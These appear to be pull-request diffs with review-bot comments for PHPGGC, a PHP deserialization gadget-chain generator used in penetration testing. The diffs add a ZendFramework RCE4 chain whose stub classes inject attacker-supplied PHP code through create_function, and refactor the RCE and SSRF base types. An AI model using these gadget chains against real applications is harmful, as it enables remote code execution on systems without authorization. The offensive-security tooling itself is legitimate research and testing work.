5 | 5 | // https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf |
6 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
6 | class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
7 | 7 | { |
8 | 8 | public static $version = '? <= 1.12.20'; |
9 | 9 | public static $vector = '__destruct'; |
10 | 10 | public static $author = 'mpchadwick'; # GC Implementation |
11 | public static $informations = ' | |
11 | public static $information = ' | |
12 | 12 | - Uses preg_replace e modifier which has no effect in PHP >= 7.0.0 |
13 | 13 | - Payload gets executed twice |
14 | 14 | '; |
15 | public static $parameters = [ | |
16 | 'code' | |
17 | ]; | |
18 | 15 | |
19 | 16 | public function generate(array $parameters) |
20 | 17 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\ZendFramework; |
3 | 3 | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '1.11.12 <= 1.12.20'; |
7 | 7 | public static $vector = '__toString'; |
8 | 8 | public static $author = 'cf'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | Uses zf1/zend-form, which requires zf1/zend-cache. |
11 | 11 | '; |
12 | 12 |
1 | 1 | |
2 | 2 | namespace GadgetChain\ZendFramework; |
3 | 3 | |
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '2.0.1 <= ?'; |
7 | 7 | public static $vector = '__destruct'; |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\ZendFramework; | |
3 | ||
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | { | |
6 | public static $version = '? <= 1.12.20'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'ydyachenko'; | |
9 | ||
10 | public static $information = ' | |
11 | - Based on ZendFramework/RCE1 | |
12 | - Works on PHP >= 7.0.0 | |
13 | '; | |
14 | ||
15 | public function generate(array $parameters) | |
16 | { | |
17 | return new \Zend_Log( | |
18 | [new \Zend_Log_Writer_Mail( | |
19 | [1], | |
20 | [], | |
21 | new \Zend_Mail, | |
22 | new \Zend_Layout( | |
23 | new \Zend_Filter_Inflector(), | |
24 | true, | |
25 | $parameters['code'] | |
26 | ) | |
27 | )] | |
28 | ); | |
29 | } | |
30 | }⏎ |
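Review bot: `$information` says `Works on PHP >= 7.0.0`, but the gadgets for this chain route through `Zend_Filter_Callback` with `create_function`, which was deprecated in PHP 7.2 and removed in PHP 8.0, so the missing upper bound is the important part. Suggest `- Works on PHP 7.0 - 7.4 (relies on create_function(), removed in PHP 8)`. A brief comment on `generate()` explaining why `Zend_Layout` receives `$parameters['code']` as its third argument would also help, since the stub classes carry no upstream documentation in this repository.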
0 | <?php | |
1 | ||
2 | class Zend_Log | |
3 | { | |
4 | protected $_writers; | |
5 | ||
6 | function __construct($x) | |
7 | { | |
8 | $this->_writers = $x; | |
9 | } | |
10 | } | |
11 | ||
12 | class Zend_Log_Writer_Mail | |
13 | { | |
14 | protected $_eventsToMail; | |
15 | protected $_layoutEventsToMail; | |
16 | protected $_mail; | |
17 | protected $_layout; | |
18 | protected $_subjectPrependText; | |
19 | ||
20 | public function __construct( | |
21 | $eventsToMail, | |
22 | $layoutEventsToMail, | |
23 | $mail, | |
24 | $layout | |
25 | ) { | |
26 | $this->_eventsToMail = $eventsToMail; | |
27 | $this->_layoutEventsToMail = $layoutEventsToMail; | |
28 | $this->_mail = $mail; | |
29 | $this->_layout = $layout; | |
30 | $this->_subjectPrependText = null; | |
31 | } | |
32 | } | |
33 | ||
34 | class Zend_Mail | |
35 | { | |
36 | } | |
37 | ||
38 | class Zend_Layout | |
39 | { | |
40 | protected $_inflector; | |
41 | protected $_inflectorEnabled; | |
42 | protected $_layout; | |
43 | ||
44 | public function __construct( | |
45 | $inflector, | |
46 | $inflectorEnabled, | |
47 | $layout | |
48 | ) { | |
49 | $this->_inflector = $inflector; | |
50 | $this->_inflectorEnabled = $inflectorEnabled; | |
51 | $this->_layout = '){}' . $layout . '/*'; | |
52 | } | |
53 | } | |
54 | ||
55 | class Zend_Filter_Callback | |
56 | { | |
57 | protected $_callback = "create_function"; | |
58 | protected $_options = [""]; | |
59 | } | |
60 | ||
61 | class Zend_Filter_Inflector | |
62 | { | |
63 | protected $_rules = []; | |
64 | ||
65 | public function __construct() | |
66 | { | |
67 | $this->_rules['script'] = [new Zend_Filter_Callback()]; | |
68 | } | |
69 | }⏎ |
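Review bot: `Zend_Layout::__construct` builds `'){}' . $layout . '/*'`, the only non-obvious logic in these stubs, without a comment saying why; a one-liner pointing at the `create_function` callback in `Zend_Filter_Callback` as the consumer of that string would spare the next maintainer a trip to the Zend source. Style: `$this->_subjectPrependText = null;` in `Zend_Log_Writer_Mail::__construct` could be a property default (`protected $_subjectPrependText = null;`), the way `Zend_Filter_Callback` declares its values, with identical serialized output.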
45 | 45 | $clean_string = ''; |
46 | 46 | for($i=0; $i < strlen($string); $i++) |
47 | 47 | { |
48 | $letter = $string{$i}; | |
48 | $letter = $string[$i]; | |
49 | 49 | $clean_string .= ctype_print($letter) && $letter != '\\' ? |
50 | 50 | $letter : |
51 | 51 | sprintf("\\%02x", ord($letter)); |
8 | 8 | * With 's': |
9 | 9 | * O:3:"Abc":1:{s:1:"x";i:3;} -> O:3:"Abc":1:{s:+1:"x";i:3;} |
10 | 10 | * |
11 | * Note: Since PHP 7.2, only i and d (float) types can have a +. | |
11 | * Note: Since PHP 7.2, only i and d (float) types can be prefixed by | |
12 | * a plus sign. | |
12 | 13 | */ |
13 | 14 | class PlusNumbers extends Enhancement |
14 | 15 | { |
0 | <?php | |
1 | ||
2 | namespace PHPGGC\GadgetChain\RCE; | |
3 | ||
4 | /** | |
5 | * Class Command | |
6 | * Executes a command (bash/batch). | |
7 | * @package PHPGGC\GadgetChain\RCE | |
8 | */ | |
9 | abstract class Command extends \PHPGGC\GadgetChain\RCE | |
10 | { | |
11 | public static $type = self::TYPE_RCE_COMMAND; | |
12 | public static $parameters = [ | |
13 | 'command' | |
14 | ]; | |
15 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace PHPGGC\GadgetChain\RCE; | |
3 | ||
4 | /** | |
5 | * Class FunctionCall | |
6 | * Executes a PHP function with one argument. | |
7 | * @package PHPGGC\GadgetChain\RCE | |
8 | */ | |
9 | abstract class FunctionCall extends \PHPGGC\GadgetChain\RCE | |
10 | { | |
11 | public static $type = self::TYPE_RCE_FUNCTIONCALL; | |
12 | public static $parameters = [ | |
13 | 'function', | |
14 | 'parameter' | |
15 | ]; | |
16 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace PHPGGC\GadgetChain\RCE; | |
3 | ||
4 | /** | |
5 | * Class PHPCode | |
6 | * Executes PHP code. | |
7 | * @package PHPGGC\GadgetChain\RCE | |
8 | */ | |
9 | abstract class PHPCode extends \PHPGGC\GadgetChain\RCE | |
10 | { | |
11 | public static $type = self::TYPE_RCE_PHPCODE; | |
12 | public static $parameters = [ | |
13 | 'code' | |
14 | ]; | |
15 | }⏎ |
4 | 4 | abstract class RCE extends \PHPGGC\GadgetChain |
5 | 5 | { |
6 | 6 | public static $type = self::TYPE_RCE; |
7 | public static $parameters = [ | |
8 | 'function', | |
9 | 'parameter' | |
10 | ]; | |
7 | # TBD by subclasses | |
8 | public static $parameters = []; | |
11 | 9 | }⏎ |
0 | <?php | |
1 | namespace PHPGGC\GadgetChain; | |
2 | ||
3 | abstract class SSRF extends \PHPGGC\GadgetChain | |
4 | { | |
5 | public static $type = self::TYPE_SSRF; | |
6 | public static $parameters = [ | |
7 | 'uri' | |
8 | ]; | |
9 | } | |
10 | ?> |
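Review bot: `SSRF` is the only new abstract base without the class docblock that `Command`, `FunctionCall` and `PHPCode` carry, and the only one that ends with `?>`. For consistency add a docblock above the class — `/** Class SSRF. Makes the target issue a request to the given URI. @package PHPGGC\GadgetChain */` — drop the closing tag, and insert the blank line after `<?php` that the siblings have.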
37 | 37 | public static $vector = ''; |
38 | 38 | public static $author = ''; |
39 | 39 | public static $parameters = []; |
40 | public static $informations; | |
40 | public static $information; | |
41 | 41 | |
42 | 42 | # Types |
43 | const TYPE_RCE = 'rce'; | |
44 | const TYPE_FI = 'file_include'; | |
45 | const TYPE_FR = 'file_read'; | |
46 | const TYPE_FW = 'file_write'; | |
47 | const TYPE_FD = 'file_delete'; | |
48 | const TYPE_SQLI = 'sql_injection'; | |
43 | const TYPE_RCE = 'RCE'; | |
44 | const TYPE_RCE_FUNCTIONCALL = 'RCE (Function call)'; | |
45 | const TYPE_RCE_PHPCODE = 'RCE (PHP code)'; | |
46 | const TYPE_RCE_COMMAND = 'RCE (Command)'; | |
47 | const TYPE_CMD = 'CMD'; | |
48 | const TYPE_SSRF = 'SSRF'; | |
49 | const TYPE_FR = 'File read'; | |
50 | const TYPE_FW = 'File write'; | |
51 | const TYPE_FD = 'File delete'; | |
52 | const TYPE_SQLI = 'SQL injection'; | |
49 | 53 | const TYPE_INFO = 'phpinfo()'; |
50 | 54 | |
51 | 55 | function __construct() |
125 | 129 | |
126 | 130 | $strings = []; |
127 | 131 | |
128 | if(static::$informations) | |
132 | if(static::$information) | |
129 | 133 | { |
130 | $informations = trim(static::$informations); | |
131 | $informations = preg_replace("#\n\s+#", "\n", $informations); | |
132 | $infos['Informations'] = "\n" . $informations; | |
134 | $information = trim(static::$information); | |
135 | $information = preg_replace("#\n\s+#", "\n", $information); | |
136 | $infos['Informations'] = "\n" . $information; | |
133 | 137 | } |
134 | 138 | |
135 | 139 | foreach($infos as $k => $v) |
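Review bot: The rename from `$informations` to `$information` stops short of the display key: `$infos['Informations'] = "\n" . $information;` still labels the section `Informations`, so `-i` output keeps the spelling the help text now drops; `$infos['Information']` would finish the rename. Separately, the `TYPE_*` constants move from machine-readable tokens (`rce`, `file_write`) to display labels with spaces and parentheses (`RCE (Function call)`); if anything compares or filters on `$type`, or if documentation lists the old tokens, those need updating — worth a check. The enclosing method starts outside the hunk.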
450 | 450 | /** |
451 | 451 | * Displays a list of gadget chains. |
452 | 452 | */ |
453 | protected function list_gc() | |
453 | protected function list_gc($filter) | |
454 | 454 | { |
455 | 455 | $this->o(""); |
456 | 456 | $this->o("Gadget Chains"); |
467 | 467 | $data = []; |
468 | 468 | foreach($this->chains as $chain) |
469 | 469 | { |
470 | if($filter && stripos($chain::get_name(), $filter) === false) | |
471 | continue; | |
470 | 472 | $data[] = [ |
471 | 473 | $chain::get_name(), |
472 | 474 | $chain::$version, |
473 | 475 | $chain::$type, |
474 | 476 | $chain::$vector, |
475 | ($chain::$informations ? '*' : '') | |
477 | ($chain::$information ? '*' : '') | |
476 | 478 | ]; |
477 | 479 | } |
478 | 480 | |
499 | 501 | |
500 | 502 | $this->o('INFORMATION'); |
501 | 503 | $this->o(' -h, --help Displays help'); |
502 | $this->o(' -l, --list Lists available gadget chains'); | |
503 | $this->o(' -i, --informations'); | |
504 | $this->o(' Displays informations about a gadget chain'); | |
504 | $this->o(' -l, --list [filter] Lists available gadget chains'); | |
505 | $this->o(' -i, --information'); | |
506 | $this->o(' Displays information about a gadget chain'); | |
505 | 507 | $this->o(''); |
506 | 508 | $this->o('OUTPUT'); |
507 | 509 | $this->o(' -o, --output <file>'); |
554 | 556 | $this->o(' --test-payload'); |
555 | 557 | $this->o(' Instead of displaying or storing the payload, includes vendor/autoload.php and unserializes the payload.'); |
556 | 558 | $this->o(' The test script can only deserialize __destruct, __wakeup, __toString and PHAR payloads.'); |
557 | $this->o(' Warning: This will run your payload on YOUR system !'); | |
559 | $this->o(' Warning: This will run the payload on YOUR system !'); | |
558 | 560 | $this->o(''); |
559 | 561 | |
560 | 562 | $this->o('EXAMPLES'); |
563 | $this->o(' ' . $this->_get_command_line( | |
564 | '-l' | |
565 | )); | |
566 | $this->o(' ' . $this->_get_command_line( | |
567 | '-l drupal' | |
568 | )); | |
561 | 569 | $this->o(' ' . $this->_get_command_line( |
562 | 570 | 'Laravel/RCE1', |
563 | 571 | 'system', |
614 | 622 | |
615 | 623 | foreach($valid_arguments as $k => $v) |
616 | 624 | { |
617 | $abbreviations[$k] = $k{0}; | |
625 | $abbreviations[$k] = $k[0]; | |
618 | 626 | } |
619 | 627 | |
620 | 628 | $abbreviations = [ |
691 | 699 | break; |
692 | 700 | } |
693 | 701 | # This is a parameter or an option |
694 | if(strlen($arg) >= 2 && $arg{0} == '-') | |
702 | if(strlen($arg) >= 2 && $arg[0] == '-') | |
695 | 703 | $this->_parse_cmdline_arg($i, $argv, $parameters, $options); |
696 | 704 | # This is a value |
697 | 705 | else |
705 | 713 | switch($option) |
706 | 714 | { |
707 | 715 | case 'list': |
708 | $this->list_gc(); | |
716 | $this->list_gc(count($arguments) ? $arguments[0]: null); | |
709 | 717 | return; |
710 | 718 | case 'help': |
711 | 719 | $this->help(); |